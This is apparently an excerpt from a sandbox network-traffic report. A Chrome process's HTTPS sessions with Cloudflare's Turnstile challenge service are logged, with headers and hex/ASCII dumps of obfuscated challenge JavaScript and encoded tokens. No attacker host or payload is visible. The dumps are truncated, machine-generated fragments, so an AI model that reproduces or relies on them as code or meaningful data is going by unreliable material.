                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 69 31 28 31 32 32 32 29 5d 28 66 2c 65 5b 69 31 28 38 31 34 29 5d 2c 69 31 28 33 32 38 29 29 29 3a 28 6a 3d 64 5b 69 31 28 31 36 31 35 29 5d 5b 69 31 28 31 31 36 34 29 5d 28 27 5c 6e 27 29 2c 6a 5b 69 31 28 31 35 36 30 29 5d 3e 31 29 26 26 28 65 5b 69 31 28 38 36 36 29 5d 28 69 31 28 31 31 32 31 29 2c 65 5b 69 31 28 31 32 39 34 29 5d 29 3f 28 73 3d 42 5b 43 5d 2c 76 3d 44 28 45 2c 46 2c 73 29 2c 65 5b 69 31 28 34 39 30 29 5d 28 47 2c 76 29 29 3f 28 78 3d 76 3d 3d 3d 27 73 27 26 26 21 52 5b 69 31 28 33 34 33 29 5d 28 53 5b 73 5d 29 2c 65 5b 69 31 28 31 34 31 39 29 5d 28 69 31 28 31 31 35 35 29 2c 54 2b 73 29 3f 55 28 56 2b 73 2c 76 29 3a 78 7c 7c 57 28 58 2b 73 2c 59 5b 73 5d 29 29 3a 65 5b 69 31 28 31 31 32 32 29 5d 28 50 2c 65 5b 69 31 28 31 35 33 35 29
                                                                          Data Ascii: i1(1222)](f,e[i1(814)],i1(328))):(j=d[i1(1615)][i1(1164)]('\n'),j[i1(1560)]>1)&&(e[i1(866)](i1(1121),e[i1(1294)])?(s=B[C],v=D(E,F,s),e[i1(490)](G,v))?(x=v==='s'&&!R[i1(343)](S[s]),e[i1(1419)](i1(1155),T+s)?U(V+s,v):x||W(X+s,Y[s])):e[i1(1122)](P,e[i1(1535)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.449769104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:38 UTC740OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:39 UTC240INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:39 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          cache-control: max-age=2629800, public
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef491ddef64338-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.449770104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:40 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:40 UTC240INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:40 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          cache-control: max-age=2629800, public
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef4928592c43c3-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:40 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.449771104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:40 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8eef4911a8e143cb&lang=auto HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:41 UTC331INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:41 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 120401
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef492a896d7c7c-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:41 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 32 30 70 61 67 65 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f
                                                                          Data Ascii: 20page.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","human_button_text":"Verify%20you%20are%20human","time_check_cached_warning":"Your%20device%20clo
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 66 5a 2c 67 30 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 66 58 2c 66 59 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 33 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 39 32 34 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 32 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 32 32 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 39 35 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 35 36 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 33 36 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 35 35 29 29
                                                                          Data Ascii: fZ,g0,gw,gA,gB,gC,gG,gH,fX,fY){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1213))/1*(parseInt(gI(924))/2)+parseInt(gI(1102))/3+parseInt(gI(822))/4+parseInt(gI(1195))/5+parseInt(gI(756))/6+parseInt(gI(536))/7*(parseInt(gI(1155))
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 35 32 31 29 5d 5b 67 4d 28 34 39 36 29 5d 2c 27 2f 27 29 3a 27 27 2c 6f 3d 6b 5b 67 4d 28 31 32 32 33 29 5d 28 6b 5b 67 4d 28 31 33 36 35 29 5d 28 6b 5b 67 4d 28 31 33 36 35 29 5d 28 6b 5b 67 4d 28 31 33 38 30 29 5d 2b 6e 2c 67 4d 28 38 35 37 29 29 2b 31 2b 67 4d 28 31 39 31 33 29 2b 65 4d 5b 67 4d 28 31 35 32 31 29 5d 5b 67 4d 28 31 31 36 37 29 5d 2b 27 2f 27 2c 65 4d 5b 67 4d 28 31 35 32 31 29 5d 2e 63 48 29 2c 27 2f 27 29 2b 65 4d 5b 67 4d 28 31 35 32 31 29 5d 5b 67 4d 28 37 31 33 29 5d 2c 73 3d 7b 7d 2c 73 5b 67 4d 28 38 33 30 29 5d 3d 65 4d 5b 67 4d 28 31 35 32 31 29 5d 5b 67 4d 28 38 33 30 29 5d 2c 73 5b 67 4d 28 31 37 39 31 29 5d 3d 65 4d 5b 67 4d 28 31 35 32 31 29 5d 5b 67 4d 28 31 37 39 31 29 5d 2c 73 5b 67 4d 28 36 39 30 29 5d 3d 65 4d 5b 67 4d
                                                                          Data Ascii: 521)][gM(496)],'/'):'',o=k[gM(1223)](k[gM(1365)](k[gM(1365)](k[gM(1380)]+n,gM(857))+1+gM(1913)+eM[gM(1521)][gM(1167)]+'/',eM[gM(1521)].cH),'/')+eM[gM(1521)][gM(713)],s={},s[gM(830)]=eM[gM(1521)][gM(830)],s[gM(1791)]=eM[gM(1521)][gM(1791)],s[gM(690)]=eM[gM
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 29 2c 6b 3d 6a 2c 6c 3d 65 5b 67 50 28 31 38 39 39 29 5d 28 29 2c 6d 3d 6b 5b 67 50 28 31 33 31 32 29 5d 2c 6b 5b 67 50 28 31 31 36 39 29 5d 28 6c 5b 67 50 28 31 36 38 36 29 5d 28 6d 29 2c 2d 31 29 29 3f 65 4d 5b 67 50 28 31 34 30 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 51 29 7b 67 51 3d 67 50 2c 67 51 28 37 38 31 29 3d 3d 3d 6b 5b 67 51 28 31 36 33 33 29 5d 3f 65 5b 67 51 28 38 31 36 29 5d 3d 6b 5b 67 51 28 31 31 39 34 29 5d 28 67 51 28 31 34 39 32 29 2c 66 29 2b 67 51 28 31 32 37 39 29 3a 65 4d 5b 67 51 28 31 34 34 30 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6e 3d 7b 7d 2c 6e 5b 67 50 28 31 38 37 30 29 5d 3d 65 2c 6e 5b 67 50 28 36 37 31 29 5d 3d 66 2c 6e 5b 67 50 28 31 38 32 38 29 5d 3d 67 2c 6e 5b 67 50 28 31 39 30 30 29 5d 3d 68 2c 6e 5b 67 50 28 31 35
                                                                          Data Ascii: ),k=j,l=e[gP(1899)](),m=k[gP(1312)],k[gP(1169)](l[gP(1686)](m),-1))?eM[gP(1409)](function(gQ){gQ=gP,gQ(781)===k[gQ(1633)]?e[gQ(816)]=k[gQ(1194)](gQ(1492),f)+gQ(1279):eM[gQ(1440)]()},1e3):(n={},n[gP(1870)]=e,n[gP(671)]=f,n[gP(1828)]=g,n[gP(1900)]=h,n[gP(15
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 57 70 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 77 48 61 52 6c 27 3a 64 5b 68 46 28 31 37 31 32 29 5d 2c 27 55 72 4b 73 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 47 6c 43 4b 73 27 3a 68 46 28 31 33 37 36 29 7d 2c 66 28 68 46 28 31 38 34 34 29 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 68 48 29 7b 68 48 3d 68 46 2c 6c 5b 68 48 28 38 31 36 29 5d 2b 3d 67 5b 68 48 28 35 37 38 29 5d 28 67 5b 68 48 28 31 37 38 33 29 5d 2c 67 5b 68 48 28 31 34 32 33 29 5d 28 69 2c 6a 29 29 2b 67 5b 68 48 28 31 32 31 32 29 5d 7d 29 29 3a 64 5b 68 46 28 37 31 37 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 72 29 29 7d 29 2c 66 74 3d 21 5b 5d 2c 21 65 55 28 67 4a 28 31 32 36 33 29
                                                                          Data Ascii: WpK':function(h,i){return h+i},'wHaRl':d[hF(1712)],'UrKsD':function(h,i){return h(i)},'GlCKs':hF(1376)},f(hF(1844),function(l,hH){hH=hF,l[hH(816)]+=g[hH(578)](g[hH(1783)],g[hH(1423)](i,j))+g[hH(1212)]})):d[hF(717)](clearInterval,fr))}),ft=![],!eU(gJ(1263)
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 2c 27 6d 4a 59 55 56 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 5e 68 7d 2c 27 66 7a 42 43 49 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 68 5e 67 7d 2c 27 50 63 76 67 62 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 2b 68 7d 2c 27 7a 53 4d 78 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 5e 68 7d 2c 27 4e 52 49 68 47 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 26 68 7d 2c 27 4c 53 61 6a 41 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 2b 68 7d 2c 27 4b 55 43 68 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 5e 68 7d 2c 27 49 4a 68 49 57 27 3a 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: ,'mJYUV':function(g,h){return g^h},'fzBCI':function(g,h){return h^g},'Pcvgb':function(g,h){return g+h},'zSMxZ':function(g,h){return g^h},'NRIhG':function(g,h){return g&h},'LSajA':function(g,h){return g+h},'KUChZ':function(g,h){return g^h},'IJhIW':function
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 28 34 37 30 29 5d 28 65 4d 5b 69 75 28 31 35 32 31 29 5d 5b 69 75 28 31 31 36 37 29 5d 2c 27 5f 27 29 2b 30 2c 6c 3d 6c 5b 69 75 28 39 38 31 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 2c 69 76 29 7b 69 76 3d 69 75 2c 6a 5e 3d 6c 5b 69 76 28 39 36 38 29 5d 28 73 29 7d 29 2c 66 3d 65 4d 5b 69 75 28 31 35 32 32 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 69 75 28 39 36 38 29 5d 28 2b 2b 69 29 29 3b 6b 5b 69 75 28 31 31 38 38 29 5d 28 53 74 72 69 6e 67 5b 69 75 28 31 30 38 30 29 5d 28 68 5b 69 75 28 37 39 38 29 5d 28 28 32 35 35 26 6d 29 2d 6a 2d 68 5b 69 75 28 37 32 32 29 5d 28 69 2c 36 35 35 33 35 29 2b 36 35 35 33 35 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 69 75 28 31 39 33 33 29 5d 28 27
                                                                          Data Ascii: (470)](eM[iu(1521)][iu(1167)],'_')+0,l=l[iu(981)](/./g,function(n,s,iv){iv=iu,j^=l[iv(968)](s)}),f=eM[iu(1522)](f),k=[],i=-1;!isNaN(m=f[iu(968)](++i));k[iu(1188)](String[iu(1080)](h[iu(798)]((255&m)-j-h[iu(722)](i,65535)+65535,255))));return k[iu(1933)]('
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 68 7d 2c 27 79 77 58 6d 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 53 4d 48 43 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 28 29 7d 2c 27 64 4b 6a 42 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 64 56 44 47 50 27 3a 6a 73 28 31 32 31 37 29 2c 27 6d 76 79 51 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4a 64 64 5a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 78 49 57 4e 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6a 52 77 46 66 27 3a 6a 73 28 31 38 30 34 29 2c 27 5a 67 46 72 4f 27 3a 66 75 6e
                                                                          Data Ascii: h},'ywXmq':function(h,i){return h-i},'SMHCY':function(h){return h()},'dKjBM':function(h,i){return i!==h},'dVDGP':js(1217),'mvyQv':function(h,i){return i==h},'JddZc':function(h,i){return h==i},'xIWNX':function(h,i){return h(i)},'jRwFf':js(1804),'ZgFrO':fun
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 47 5b 6a 76 28 31 31 38 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 6a 76 28 39 36 38 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 6a 76 28 31 35 33 39 29 5d 28 48 3c 3c 31 2c 31 2e 30 38 26 4f 29 2c 49 3d 3d 64 5b 6a 76 28 37 34 37 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 6a 76 28 31 31 38 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 64 5b 6a 76 28 37 30 33 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 6a 76 28 31 39 33 35 29 5d 28 48 2c 31 29 7c 4f 2c 64 5b 6a 76 28 38 34 31 29 5d 28 49 2c 64 5b 6a 76 28 37 34 37 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 76 28 31 31 38 38 29 5d 28 6f 28 48 29
                                                                          Data Ascii: G[jv(1188)](o(H)),H=0):I++,s++);for(O=C[jv(968)](0),s=0;8>s;H=d[jv(1539)](H<<1,1.08&O),I==d[jv(747)](j,1)?(I=0,G[jv(1188)](o(H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;d[jv(703)](s,F);H=d[jv(1935)](H,1)|O,d[jv(841)](I,d[jv(747)](j,1))?(I=0,G[jv(1188)](o(H)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.449772104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:41 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 3988
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          CF-Chl-RetryAttempt: 0
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:41 UTC3988OUTData Raw: 76 5f 38 65 65 66 34 39 31 31 61 38 65 31 34 33 63 62 3d 4e 64 4b 72 56 72 30 72 4a 72 61 72 31 72 7a 5a 4d 65 5a 4d 66 46 72 24 73 39 54 37 45 73 75 78 76 4d 25 32 62 79 4d 56 55 72 49 4f 4d 70 72 37 64 4d 6d 4d 44 75 79 4d 45 33 32 72 56 79 4d 50 72 45 6e 58 66 4d 77 75 72 4d 45 61 24 4d 30 35 66 4d 37 55 49 35 54 79 68 72 32 4d 6f 4e 4d 30 34 32 4f 55 6a 4b 49 50 4b 73 55 61 66 70 46 32 6c 2b 66 49 48 49 49 78 54 4d 4e 4d 4b 54 49 69 63 51 72 4d 35 48 2d 71 62 51 74 43 4c 72 6e 46 63 35 61 24 77 37 59 49 4b 4d 6d 35 6e 75 79 72 49 58 4f 47 6a 35 57 4b 4b 4b 41 6d 4f 4f 4d 49 73 4b 4d 34 72 34 36 4e 55 31 4d 4b 64 6b 4b 75 64 4d 6f 72 55 4d 58 68 73 4d 68 41 77 66 4d 4b 65 31 4d 6d 6b 5a 50 72 49 52 65 35 41 4a 50 7a 72 4d 4f 68 5a 55 58 4e 61 73 58 63
                                                                          Data Ascii: v_8eef4911a8e143cb=NdKrVr0rJrar1rzZMeZMfFr$s9T7EsuxvM%2byMVUrIOMpr7dMmMDuyME32rVyMPrEnXfMwurMEa$M05fM7UI5Tyhr2MoNM042OUjKIPKsUafpF2l+fIHIIxTMNMKTIicQrM5H-qbQtCLrnFc5a$w7YIKMm5nuyrIXOGj5WKKKAmOOMIsKM4r46NU1MKdkKudMorUMXhsMhAwfMKe1MmkZPrIRe5AJPzrMOhZUXNasXc
                                                                          2024-12-08 19:50:41 UTC714INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:41 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 80568
                                                                          Connection: close
                                                                          cf-chl-gen: Xx6bOYW3R+/X1BYy8EqhsJ239aGvk/TXurlKCBW1Cd8y5Bg3JY/svTb/FoJyN41ZmgwB+TXhMQplHqPlQ2R2T1VyYHZV/LL+qudEDCdJcYJ0MjJ8tjUoY/J6/K6gfnyc67Y5cVkm76e4Unem+84UF34e/X3lbw68BZswA/2gdwm7gCI9rSnIDPF+4JIlE005gKQDPfje/vSYszGCum47FKb86uCj3bGdoo0BYrMxJsv4BnurYR5rC3U1FwifkrCTyd/8S8qNtCI4gPlhgdKGprMm75xooPvrufZ1QbG/6cP1HPqoYDlEXzGe94kNNQv+dLOBgACNCGIYniVWGQvsvkVfjer3aXkMwWSQ9MrHLbs/gqR8hChgegR7kz4toWZdawyg2rG2Cs5OsIOhl+qTKLgIbL/8g/j0tUKMzgqTcoINNggpOHCciJRvwfC4ySA0MRHR52deGsZz1B/i$uhqWIqZAS5NtTDyv
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef492cdc550f3f-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:41 UTC655INData Raw: 6a 6f 47 48 66 6f 71 54 53 33 31 63 68 70 61 51 68 70 69 4f 6c 5a 56 51 55 71 57 6f 5a 30 32 6c 6d 4a 36 56 6f 61 70 69 6c 4a 46 6e 6c 58 5a 68 6e 47 4e 34 58 72 61 70 72 36 61 79 75 33 4f 6c 6f 6e 6d 6d 68 33 4b 75 64 49 6c 76 63 48 46 79 79 62 58 48 64 72 61 37 76 37 6d 2b 78 4d 6d 39 77 74 54 5a 67 71 43 45 78 74 6a 4f 33 64 62 50 32 65 44 67 79 5a 2f 4e 72 48 79 54 6c 4a 57 57 37 64 6e 72 6d 75 37 68 36 2b 4c 52 35 66 4c 33 36 50 66 35 70 73 53 6f 36 76 7a 79 41 76 72 7a 2f 51 55 46 37 63 54 78 30 4b 43 68 75 4c 6d 36 75 77 59 45 76 73 63 41 42 51 6b 44 43 41 34 54 42 77 77 65 49 39 6e 7a 2b 43 49 63 48 65 4c 53 38 50 48 79 31 75 66 68 32 54 62 46 78 74 33 65 33 2b 44 68 34 75 50 6b 4a 53 6f 75 4b 43 30 7a 4f 43 77 78 51 30 6a 77 44 2f 4a 50 33 76 58
                                                                          Data Ascii: joGHfoqTS31chpaQhpiOlZVQUqWoZ02lmJ6VoapilJFnlXZhnGN4Xrapr6ayu3Olonmmh3KudIlvcHFyybXHdra7v7m+xMm9wtTZgqCExtjO3dbP2eDgyZ/NrHyTlJWW7dnrmu7h6+LR5fL36Pf5psSo6vzyAvrz/QUF7cTx0KChuLm6uwYEvscABQkDCA4TBwweI9nz+CIcHeLS8PHy1ufh2TbFxt3e3+Dh4uPkJSouKC0zOCwxQ0jwD/JP3vX
